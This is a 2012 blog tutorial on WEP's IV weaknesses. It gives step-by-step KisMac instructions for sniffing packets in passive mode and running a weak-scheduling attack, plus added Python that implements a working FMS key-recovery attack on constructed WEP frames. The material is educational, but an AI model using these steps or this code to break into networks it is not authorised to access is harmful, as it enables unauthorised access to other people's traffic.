Thursday, October 4, 2012

WEP Cracking: Is Your Wi-Fi Secure?

In this tutorial we will cover the basic infrastructure of a wireless network, how data inside the network is transferred, how that data is encrypted, and how we can crack a WEP key from that data.

Understanding Wi-Fi
Wi-Fi allows users to connect to the Internet wirelessly, within range of their wireless local area network (WLAN). More precisely, a WLAN is two or more computers with wireless network interface cards (NICs) linked to each other over radio.
In WLANs, connected devices are called stations. There are two categories of station: access points (APs) and clients. An AP is the base station of a wireless network; it is the device that sends and receives the information the clients communicate. An AP together with the clients associated with it is known as a Basic Service Set (BSS), and it is identified by its BSSID, which is the MAC address of the AP's wireless interface. Every station, AP or client, also has its own unique MAC address, tied to its NIC. The AP broadcasts its SSID, which can then be picked up by other stations within range. This is the name you see when connecting to a network. Here are the SSIDs, as they would appear in your Airport Utility….
[Screenshot 1.png: SSIDs as listed by Airport Utility]

Data Streams (Packets)
So, your computer has picked up the SSID of a service set. Data is no longer transferred between the AP and the client through a wire; it is sent as packets over the WLAN, and a computer does not need physical access to the network to pick those packets up: anyone within radio range can capture them. So while packets are being transferred (which is all the time while you use the Internet), a wireless connection is at its weakest point. You may wonder, “How is my security threatened when I have wireless encryption?” There are two main kinds of encryption for wireless networks, WEP and WPA.

WEP - Wired Equivalent Privacy: WEP, WEP2, WEP+ (same vulnerability)
• 3 key lengths: 64, 128, 256 bits (WEP 64, WEP 128, WEP 256). These advertised lengths include the 24-bit IV, so the secret part of the key is only 40, 104 or 232 bits.
• WEP does not offer a high level of security, but it is compatible with all older devices, which made it popular in home and small-business environments.
• Each packet is encrypted with RC4 under a per-packet key made of the 24-bit Initialization Vector (IV), which is sent in the clear in front of the packet, concatenated with the secret passcode (the shared key). The passcode itself never changes; it is often generated for the user by the router's setup, but it can be, and should be, changed.
WPA - Wi-Fi Protected Access: WPA, WPA2
• WPA was created to give each client its own keys (in its enterprise mode, with 802.1X authentication). It can also be, and still widely is, used in a pre-shared key (PSK) setting, where every client is configured with the same passphrase. In that setting WPA is only as strong as the passphrase: anyone who knows it, or can guess it from a captured handshake, gets in.
• WPA fixes many of WEP's weaknesses, the most prominent being a 48-bit IV (twice the size of WEP's 24-bit one) that doubles as a sequence counter, so IVs are never reused for the life of a key.

Packet Sniffing
“Packet sniffing” is the term for capturing encrypted packets off a WLAN, which the radio delivers to anyone within range. Every packet carries its IV in the clear: 24 bits for WEP, 48 bits for WPA. The pre-shared key is static; what changes from packet to packet is the IV, and IV plus static key is what encrypts each packet, so the IVs are exactly what we need to collect in order to recover the key. As the “potential hacker,” our goal is to obtain the network key, which would be far harder if every IV were unique and never reused. They are not: with only 24 bits there are 2^24 = 16,777,216 possible values, and a repeated IV (a collision) means the same RC4 keystream has been used on two packets, so XORing the two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts. If IVs are chosen at random, the birthday bound gives a 50% probability of a repeat after roughly 5,000 packets (4,823, to be exact), and many early cards simply counted up from zero after every reset, which guarantees reuse. A repeat is not the only thing a captured IV gives away, either: certain “weak” IVs leak information about individual key bytes, and that is what the cracking step later in this tutorial exploits. So, how do we sniff the packets? Luckily there is a very easy to use, convenient program….KisMac
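The collision arithmetic above, checked in code. This is an added example written for this page, not code from the original post or from KisMac: it computes the exact birthday probability for a 24-bit IV space, the closed-form estimate, and then shows what a repeated IV hands an attacker. The keystream and the two plaintexts in the demo are constructed bytes, not a real capture.

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible WEP IVs


def collision_probability(packets, space=IV_SPACE):
    """Exact probability that at least one IV value repeats among `packets`
    packets whose IVs are drawn uniformly at random (the birthday problem)."""
    p_all_distinct = 1.0
    for i in range(packets):
        p_all_distinct *= (space - i) / space
    return 1.0 - p_all_distinct


def packets_for_probability(target, space=IV_SPACE):
    """Smallest packet count at which a repeat is at least `target` likely."""
    p_all_distinct, n = 1.0, 0
    while 1.0 - p_all_distinct < target:
        p_all_distinct *= (space - n) / space
        n += 1
    return n


def birthday_estimate(target=0.5, space=IV_SPACE):
    """Closed-form approximation sqrt(2 * N * ln(1/(1-p))) of the same count."""
    return math.sqrt(2 * space * math.log(1.0 / (1.0 - target)))


def recover_from_reuse(c1, c2, known_p1):
    """Two frames sent under the same IV are XORed with the same RC4 keystream,
    so c1 ^ c2 == p1 ^ p2: knowing one plaintext reveals the other, no key needed."""
    if not (len(c1) == len(c2) == len(known_p1)):
        raise ValueError("frames must be the same length")
    return bytes(a ^ b ^ p for a, b, p in zip(c1, c2, known_p1))


if __name__ == "__main__":
    print("IV space:", IV_SPACE)
    print("50%% repeat after %d packets (estimate %.1f)"
          % (packets_for_probability(0.5), birthday_estimate()))
    print("P(repeat) at 5,000 packets: %.3f" % collision_probability(5000))

    # Constructed stand-in for an RC4 keystream reused under one IV
    keystream = bytes([0x4A, 0x97, 0x12, 0xE0, 0x35, 0xC8, 0x7B, 0x06, 0xD1, 0x5F])
    p1 = b"ARP reques"          # plaintext the attacker can guess (fixed-format frame)
    p2 = b"SECRET:pw1"          # plaintext the attacker wants
    c1 = bytes(a ^ k for a, k in zip(p1, keystream))
    c2 = bytes(a ^ k for a, k in zip(p2, keystream))
    print("recovered from IV reuse:", recover_from_reuse(c1, c2, p1))
```

The exact count (4,823 packets for a 50% chance of one repeat) is what the "as few as 5,000 packets" above rounds to; the estimate differs from it by less than one packet, so the square-root rule is good enough for sizing a capture.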

Cracking
Requirements: Mac OS X, KisMac (a USB Wi-Fi adapter is optional)
1. Obtain the program KisMac here...
2. Drag KisMac to your Apps folder…
3. Simply open KisMac
[Screenshot 2.png]
Configuring and Scanning
We need to tell KisMac which driver (NIC) to use:
1. Click the “KisMac” menu, then Preferences
2. Select the driver from the drop-down menu
3. Choose “Apple Airport Extreme Card (Passive)”. Passive means monitor mode: the card only listens and never associates with the network, so the capture leaves no trace on the AP.
4. Then select “All” channels, and “Keep Everything”, so every captured packet is kept
5. Lastly, add the driver; it should now appear as shown…
6. You can close Preferences
Preferences: [Screenshot 4.png]
Settings: [Screenshot 3.png]

Begin Scanning
1. Back in the main window of KisMac, start your scan (button in the bottom right corner)
2. You will be asked for your admin password; go ahead and enter it. KisMac needs those privileges to drive the card in passive mode and to save your capture.
3. Your networks should appear within a second or so
4. Find your network and select it, and note which channel it is on
5. Go back to Preferences and change the Airport card's passive settings so that it only scans your network's channel; hopping across all channels means missing most of that network's packets. (If you want to collect packets from all channels at once, skip this step.)
6. You are now sniffing the packets and collecting unique IVs
Info: [Screenshot 6.png]
The Actual Cracking
Note that we must collect enough packets to have enough unique IVs. Despite the talk of collisions earlier, the weak scheduling attack does not wait for IV repeats: it needs volume. Only a small fraction of IVs are “weak” (each leaks one byte of the key through RC4's key scheduling, and only a few percent of the time), and the attack tallies votes over all of them, so the more distinct IVs you have, the more weak ones you catch. The suggested minimum is 130,000 unique IVs, but more never hurts.
1. Once you have 130,000+ unique IVs, the cracking can begin
2. Navigate to the “Network” menu, then “Crack”, then “Weak Scheduling Attack”, then “Against Both” (this assumes you don't know the key length in bits; if you do, pick the 40-bit or 104-bit option instead)
3. Depending on the key length, the processing power of your computer, and how many weak IVs your capture happens to contain, this has been known to take anywhere from 5 seconds to hours.
Find it: [Screenshot 7.png]
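The “Weak Scheduling Attack” in step 2 is the Fluhrer, Mantin and Shamir (FMS) attack on RC4's key schedule. To show what KisMac is actually doing with all those IVs, here is an added Python example written for this page; it is not KisMac's code and not part of the original post. It builds WEP frames the way the WEP bullet list above describes (RC4 key = IV || secret key, CRC-32 ICV on the payload), feeds the attack a constructed capture containing one frame under each FMS weak IV of the form (b, 255, x), and recovers a 40-bit key byte by byte with a small aircrack-style fudge factor. The secret key, the payload bytes, the fudge factor and the capture itself are assumptions chosen for the demo; the one real-world fact it relies on is that every WEP data payload starts with the LLC/SNAP byte 0xAA, which gives away the first keystream byte of every frame.

```python
import zlib
from collections import Counter

KEY_LEN = 5            # WEP-40 ("64-bit WEP"): 24-bit IV + 40-bit secret key
SNAP_FIRST = 0xAA      # every WEP data payload starts with the LLC/SNAP byte 0xAA


def rc4_keystream(key, length):
    """Plain RC4: key-scheduling (KSA) followed by output generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, payload):
    """WEP frame body: RC4(IV || secret) over payload || CRC-32 ICV; IV sent in clear."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_keystream(iv + secret, len(body))
    return iv + bytes(b ^ k for b, k in zip(body, ks))


def wep_decrypt(secret, frame):
    """Decrypt one frame; return the payload only if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + secret, len(body))
    plain = bytes(b ^ k for b, k in zip(body, ks))
    payload, icv = plain[:-4], plain[-4:]
    return payload if zlib.crc32(payload).to_bytes(4, "little") == icv else None


def fms_votes(frames, known_prefix):
    """FMS votes for the secret-key byte that follows known_prefix.

    The RC4 key is IV || secret, so that byte sits at KSA index b = 3 + len(prefix).
    Run only the first b KSA steps. When S[1] + S[S[1]] == b (the "resolved" state)
    the first keystream byte Z equals S_b[j_b + S_b[b] + K[b]] about 5% of the time,
    giving K[b] = S_b^-1[Z] - j_b - S_b[b]. Wrong votes scatter; the right one piles up."""
    b = 3 + len(known_prefix)
    votes = Counter()
    for frame in frames:
        key = frame[:3] + known_prefix
        z = frame[3] ^ SNAP_FIRST                 # first keystream byte via known plaintext
        s, j = list(range(256)), 0
        for i in range(b):
            j = (j + s[i] + key[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        x = s[1]
        if x < b and (x + s[x]) & 0xFF == b:
            votes[(s.index(z) - j - s[b]) & 0xFF] += 1
    return votes


def crack(frames, key_len=KEY_LEN, fudge=5):
    """Depth-first over the `fudge` best-voted candidates per byte (aircrack-style
    fudge factor); the ICV of a captured frame decides when the whole key is right."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, frames[0]) is not None else None
        for cand, _ in fms_votes(frames, prefix).most_common(fudge):
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


def simulate_capture(secret, payload):
    """Constructed stand-in for a sniffed capture: one frame under each FMS weak IV
    (b, 0xFF, x) for every key position b. A real capture has to be sniffed until
    enough of these turn up among all the other IVs."""
    return [wep_encrypt(secret, bytes([b, 0xFF, x]), payload)
            for b in range(3, 3 + len(secret)) for x in range(256)]


# Constructed demo data: an assumed WEP-40 key and a SNAP-headed (ARP-like) payload.
SECRET = bytes.fromhex("1A2B3C4D5E")
PAYLOAD = bytes.fromhex("AAAA030000000806") + b"constructed ARP body"

if __name__ == "__main__":
    capture = simulate_capture(SECRET, PAYLOAD)
    print("frames in capture:", len(capture))
    print("top votes for key byte 0:", fms_votes(capture, b"").most_common(3))
    print("recovered key:", crack(capture).hex())
```

The constructed capture is tiny (1,280 frames) only because every frame in it carries a weak IV. In a real capture weak IVs are a small minority, which is why the tutorial asks for 130,000 or more unique IVs; the later PTW attack in aircrack-ng gets by with far fewer because it uses every IV, not just the weak ones.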
